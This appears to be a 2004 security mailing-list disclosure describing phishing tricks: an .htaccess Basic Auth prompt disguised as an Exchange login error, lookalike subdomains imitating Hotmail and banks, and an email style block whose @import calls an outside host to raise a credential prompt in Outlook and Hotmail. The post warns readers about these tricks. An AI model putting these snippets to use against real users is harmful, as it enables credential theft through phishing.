Phriday , May 21, 2004 Several pheeble yet interesting phishing possibilities arise as phollows: Take one .htaccess trivially modified to suit the target scenario: AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN" AuthType Basic One throw-away domain which can include the target's host name: http://www.hotmail.hackerguy.nickelandimehosting.com http://www.evenlargerbank.money.nickelandimehosting.com http://www.bloatedcorp.lackey.nickelandimehosting.com A couple of ridiculous email contraptions: <STYLE type=text/css> @import url( http://www.malware.com/pheesh ); </STYLE> 1. Outlook Express [screen shot http://www.malware.com/phool.png 56KB] 2. Outlook 2003 [screen shot: http://www.malware.com/ohlook.png 39KB] note: the above 'style sheet' works on outbound [reply to] [so much for not downloading external content] inbound can be achieved as well via http://securityfocus.com/bid/10369 which has an even more convincing network login applet 3. Hotmail [screen shot: http://www.malware.com/goturmail.png 91KB] hint : hotmail[and other] web designer people; off-set the html login form on the site as many prime banks have done. The possibilities are obviously endless. BE AWARE OF THE SHARKS OUT THERE NB: anyone have any contact or connection to the upper management security or abuse dept. of one public company called: SAVVIS Communications. http://savvis.net/ it appears their abuse dept. is woefully negligent in attending to abuse affairs. End Call -- http://www.malware.com
